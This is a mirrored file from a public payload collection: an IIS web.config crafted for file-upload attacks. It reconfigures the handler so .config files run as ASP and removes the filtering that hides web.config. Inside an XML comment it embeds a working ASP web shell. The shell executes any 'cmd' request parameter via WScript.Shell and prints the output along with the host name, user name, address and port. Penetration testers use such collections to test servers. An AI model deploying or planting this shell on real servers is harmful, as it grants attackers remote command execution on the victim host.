mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-15 07:42:57 +00:00
65 lines
1.8 KiB
XML
65 lines
1.8 KiB
XML
<?xml version="1.0" encoding="UTF-8"?>
|
|
<configuration>
|
|
<system.webServer>
|
|
<handlers accessPolicy="Read, Script, Write">
|
|
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
|
|
</handlers>
|
|
<security>
|
|
<requestFiltering>
|
|
<fileExtensions>
|
|
<remove fileExtension=".config" />
|
|
</fileExtensions>
|
|
<hiddenSegments>
|
|
<remove segment="web.config" />
|
|
</hiddenSegments>
|
|
</requestFiltering>
|
|
</security>
|
|
</system.webServer>
|
|
</configuration>
|
|
<!--
|
|
<% Response.write("-"&"->")%>
|
|
<%
|
|
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
|
|
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
|
|
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
|
|
|
|
Function getCommandOutput(theCommand)
|
|
Dim objShell, objCmdExec
|
|
Set objShell = CreateObject("WScript.Shell")
|
|
Set objCmdExec = objshell.exec(thecommand)
|
|
|
|
getCommandOutput = objCmdExec.StdOut.ReadAll
|
|
end Function
|
|
%>
|
|
|
|
<BODY>
|
|
<FORM action="" method="GET">
|
|
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
|
|
<input type="submit" value="Run">
|
|
</FORM>
|
|
|
|
<PRE>
|
|
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
|
|
<%Response.Write(Request.ServerVariables("server_name"))%>
|
|
<p>
|
|
<b>The server's port:</b>
|
|
<%Response.Write(Request.ServerVariables("server_port"))%>
|
|
</p>
|
|
<p>
|
|
<b>The server's software:</b>
|
|
<%Response.Write(Request.ServerVariables("server_software"))%>
|
|
</p>
|
|
<p>
|
|
<b>The server's software:</b>
|
|
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
|
|
<% szCMD = request("cmd")
|
|
thisDir = getCommandOutput("cmd /c" & szCMD)
|
|
Response.Write(thisDir)%>
|
|
</p>
|
|
<br>
|
|
</BODY>
|
|
|
|
|
|
|
|
<%Response.write("<!-"&"-") %>
|
|
-->
|